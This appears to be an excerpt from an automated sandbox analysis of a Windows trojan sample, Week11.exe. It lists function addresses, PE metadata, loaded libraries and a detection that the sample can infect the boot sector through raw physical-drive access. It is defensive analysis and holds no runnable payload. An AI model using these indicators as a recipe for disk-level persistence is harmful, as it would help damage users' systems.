    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041C1371_2_0041C137
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004061FC1_2_004061FC
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040618E1_2_0040618E
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004061941_2_00406194
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041C19A1_2_0041C19A
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040619F1_2_0040619F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004162461_2_00416246
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040C21D1_2_0040C21D
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041021F1_2_0041021F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041C2231_2_0041C223
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004462201_2_00446220
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004102301_2_00410230
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041C23F1_2_0041C23F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004162E61_2_004162E6
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0048C3701_2_0048C370
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004103011_2_00410301
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004063FC1_2_004063FC
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004704401_2_00470440
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040C4651_2_0040C465
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004164681_2_00416468
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040C4711_2_0040C471
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004064131_2_00406413
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004784C01_2_004784C0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040C4CD1_2_0040C4CD
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004025001_2_00402500
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041E5DC1_2_0041E5DC
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040C58F1_2_0040C58F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004145A61_2_004145A6
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040C5BD1_2_0040C5BD
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004126701_2_00412670
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041667D1_2_0041667D
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040C6031_2_0040C603
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041E6D41_2_0041E6D4
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040C6DA1_2_0040C6DA
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004186DD1_2_004186DD
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0049E6FC1_2_0049E6FC
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004167761_2_00416776
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040C7171_2_0040C717
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004107D71_2_004107D7
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041C7A71_2_0041C7A7
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004147B31_2_004147B3
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004128701_2_00412870
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041283C1_2_0041283C
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004188C31_2_004188C3
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004208F81_2_004208F8
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004148931_2_00414893
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0044A9401_2_0044A940
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004109E91_2_004109E9
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004189991_2_00418999
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00448A601_2_00448A60
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0044AA071_2_0044AA07
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0044AA091_2_0044AA09
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00408A241_2_00408A24
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00414A301_2_00414A30
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004AAAB01_2_004AAAB0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041CB421_2_0041CB42
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00412B5A1_2_00412B5A
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00408B291_2_00408B29
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00408B811_2_00408B81
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00408B941_2_00408B94
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00414C721_2_00414C72
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00410CD01_2_00410CD0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041AD541_2_0041AD54
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00418D541_2_00418D54
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004A2D761_2_004A2D76
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040CD2E1_2_0040CD2E
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040CDFE1_2_0040CDFE
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00414EC61_2_00414EC6
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416E881_2_00416E88
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416FA11_2_00416FA1
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040B0621_2_0040B062
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040D06A1_2_0040D06A
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041B00F1_2_0041B00F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041F03F1_2_0041F03F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040D0DB1_2_0040D0DB
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041712E1_2_0041712E
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004691E01_2_004691E0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040F18F1_2_0040F18F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004A32BA1_2_004A32BA
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041F3CA1_2_0041F3CA
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004153D11_2_004153D1
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004613D01_2_004613D0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004153FB1_2_004153FB
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004153B11_2_004153B1
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004153B61_2_004153B6
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004153BD1_2_004153BD
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004113BC1_2_004113BC
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041D4401_2_0041D440
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004994531_2_00499453
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004114171_2_00411417
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004734101_2_00473410
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040541D1_2_0040541D
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004154241_2_00415424
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0048F5C21_2_0048F5C2
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004075EC1_2_004075EC
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004115FF1_2_004115FF
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040D59F1_2_0040D59F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041F6401_2_0041F640
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040B6421_2_0040B642
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004076611_2_00407661
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004076061_2_00407606
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004396101_2_00439610
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040B6321_2_0040B632
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004116F11_2_004116F1
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004156F51_2_004156F5
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004136FC1_2_004136FC
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004156821_2_00415682
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041568F1_2_0041568F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004076901_2_00407690
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004116911_2_00411691
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004156A21_2_004156A2
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004076A71_2_004076A7
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040B7701_2_0040B770
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004077301_2_00407730
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040B7341_2_0040B734
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004057D31_2_004057D3
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004117D91_2_004117D9
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040B7E21_2_0040B7E2
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004A37FE1_2_004A37FE
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004157871_2_00415787
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004A579C1_2_004A579C
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040B79F1_2_0040B79F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004058451_2_00405845
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004118671_2_00411867
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004078751_2_00407875
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040F8101_2_0040F810
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004058F01_2_004058F0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004078F41_2_004078F4
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004078841_2_00407884
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041595B1_2_0041595B
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040B95B1_2_0040B95B
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004159621_2_00415962
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040B9661_2_0040B966
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040596A1_2_0040596A
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041197A1_2_0041197A
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040B9D01_2_0040B9D0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004079801_2_00407980
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041B99A1_2_0041B99A
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00411A421_2_00411A42
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00407A901_2_00407A90
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00495B441_2_00495B44
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00411B601_2_00411B60
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00405B7D1_2_00405B7D
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00405B2C1_2_00405B2C
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00405B3E1_2_00405B3E
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041FBE31_2_0041FBE3
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00415BF41_2_00415BF4
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00417BA01_2_00417BA0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00425C401_2_00425C40
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00413C5E1_2_00413C5E
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041FC6A1_2_0041FC6A
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041FC701_2_0041FC70
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00409C761_2_00409C76
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00405C7E1_2_00405C7E
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00405C291_2_00405C29
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040BC351_2_0040BC35
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00477C301_2_00477C30
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00405CD51_2_00405CD5
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041FC8D1_2_0041FC8D
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00405CB01_2_00405CB0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00405D311_2_00405D31
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00423DC01_2_00423DC0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040BDC61_2_0040BDC6
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040BDEA1_2_0040BDEA
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00405DF31_2_00405DF3
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041FE601_2_0041FE60
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040FE711_2_0040FE71
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00459E101_2_00459E10
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00487EC01_2_00487EC0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00405ECE1_2_00405ECE
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004A5E941_2_004A5E94
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0049BEA81_2_0049BEA8
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00477F301_2_00477F30
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00409FE31_2_00409FE3
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041DFF01_2_0041DFF0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00407F811_2_00407F81
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00413FB41_2_00413FB4
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031CA2001_2_031CA200
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031D41001_2_031D4100
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031FA0121_2_031FA012
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0320C0701_2_0320C070
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_032146901_2_03214690
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031AA6A01_2_031AA6A0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031CABB01_2_031CABB0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_032169F01_2_032169F0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0321E8701_2_0321E870
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031CA8601_2_031CA860
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0321A8A01_2_0321A8A0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_03220FC01_2_03220FC0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031C8E401_2_031C8E40
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0321EE801_2_0321EE80
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031DAEC01_2_031DAEC0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031B8DD01_2_031B8DD0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0321AC101_2_0321AC10
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031C0CA01_2_031C0CA0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031C93D01_2_031C93D0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031AB2501_2_031AB250
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_032092701_2_03209270
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_032272701_2_03227270
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0320B1001_2_0320B100
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0321B1A01_2_0321B1A0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031EB1F01_2_031EB1F0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031EF0001_2_031EF000
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_032077501_2_03207750
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0321B6D01_2_0321B6D0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031C55401_2_031C5540
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031B1B701_2_031B1B70
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031B3BE01_2_031B3BE0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031A7A301_2_031A7A30
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_03219F601_2_03219F60
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031AFFE01_2_031AFFE0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031E9E401_2_031E9E40
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031E5E901_2_031E5E90
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031C9C901_2_031C9C90
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: String function: 031D3360 appears 168 times
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: String function: 031AFC50 appears 48 times
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: String function: 0048F134 appears 53 times
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: String function: 0042033F appears 117 times
    Source: Week11.exe.bin.exeStatic PE information: Resource name: UIDATA type: Zip archive data, at least v1.0 to extract, compression method=store
    Source: Week11.exe.bin.exe, 00000001.00000002.2485795081.000000000C180000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe.bin.exe
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C072000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe.bin.exe
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C16A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe.bin.exe
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C060000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe.bin.exe
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0B2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe.bin.exe
    Source: Week11.exe.bin.exe, 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe.bin.exe
    Source: Week11.exe.bin.exe, 00000001.00000002.2485795081.000000000C19E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe.bin.exe
    Source: Week11.exe.bin.exe, 00000001.00000002.2485795081.000000000C192000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe.bin.exe
    Source: Week11.exe.bin.exeBinary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe.bin.exe
    Source: Week11.exe.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: classification engineClassification label: mal80.troj.evad.winEXE@1/1@0/6
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00444920 CoCreateInstance,1_2_00444920
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00470440 FindResourceW,LoadResource,SizeofResource,FreeResource,_memset,LockResource,FreeResource,1_2_00470440
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeFile created: C:\Users\user\AppData\Local\configJump to behavior
    Source: Week11.exe.bin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: Week11.exe.bin.exeReversingLabs: Detection: 36%
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeFile read: C:\Users\user\Desktop\Week11.exe.bin.exeJump to behavior
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeSection loaded: k7rn7l32.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeSection loaded: ntd3ll.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeSection loaded: mswsock.dllJump to behavior
    Source: Week11.exe.bin.exeStatic file information: File size 8848896 > 1048576
    Source: Week11.exe.bin.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x790e00
    Source: Week11.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: Week11.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: Week11.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: Week11.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Week11.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: Week11.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: Week11.exe.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Week11.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: C:\vmagent_new\bin\joblist\498883\out\Release\QHFileSmasher.pdb source: Week11.exe.bin.exe
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0043E2B0 SetErrorMode,ImmDisableIME,GetCommandLineW,CreateMutexW,GetLastError,CloseHandle,StrStrIW,StrStrIW,StrStrIW,FindWindowW,PostMessageW,FindWindowW,PostMessageW,CoInitialize,OleInitialize,LoadLibraryW,GetProcAddress,IsUserAnAdmin,StrStrIW,CloseHandle,DefWindowProcW,InitCommonControlsEx,OleUninitialize,CoUninitialize,CloseHandle,GetModuleHandleW,GetProcAddress,1_2_0043E2B0
    Source: Week11.exe.bin.exeStatic PE information: real checksum: 0x128f7b should be: 0x870d47
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040E1B2 push es; retn 0000h1_2_0040E1B3
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040E4E7 push edi; retf 1_2_0040E4E8
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0048F016 push ecx; ret 1_2_0048F029
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0048F179 push ecx; ret 1_2_0048F18C
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004758C0 push ecx; mov dword ptr [esp], 00000000h1_2_004758C1

    Persistence and Installation Behavior

    barindex
    Contains functionality to infect the boot sector
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d1_2_004776F9
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: RegQueryValueExW,_malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d1_2_00477690
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d1_2_004A97B0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d1_2_004A9B70
